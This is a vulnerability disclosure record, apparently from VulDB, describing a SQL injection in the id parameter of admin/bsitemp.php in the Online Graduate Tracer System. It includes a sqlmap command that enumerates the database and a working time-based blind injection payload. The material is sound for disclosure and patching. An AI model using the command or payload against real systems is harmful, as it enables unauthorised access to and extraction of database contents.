| Title | Online Graduate Tracer System bsitemp.php sql injection |
|---|
| Description | Online Graduate Tracer System bsitemp.php sql injection
url:admin/bsitemp.php
Abstract:
Line 243 of bsitemp.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
1. Data enters a program from an untrusted source.
2. The data is used to dynamically construct a SQL query.
In this case, the data is passed to mysqli_query() in bsitemp.php on line 243.
sqlmap.py -u "http://localhost/tracking/admin/bsitemp.php?id=111" --level 5 --risk 3 --current-db
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=111'+(SELECT 0x67437261 WHERE 6269=6269 AND (SELECT 8178 FROM (SELECT(SLEEP(5)))mMBg))+'
Download Code:
https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html |
|---|
| Source | ⚠️ https://blog.csdn.net/Dwayne_Wade/article/details/129522869 |
|---|
| User | bit3hh (UID 42576) |
|---|
| Submission | 03/14/2023 05:04 (3 years ago) |
|---|
| Moderation | 03/14/2023 15:31 (10 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 222981 [SourceCodester Online Graduate Tracer System 1.0 bsitemp.php mysqli_query ID sql injection] |
|---|
| Points | 20 |
|---|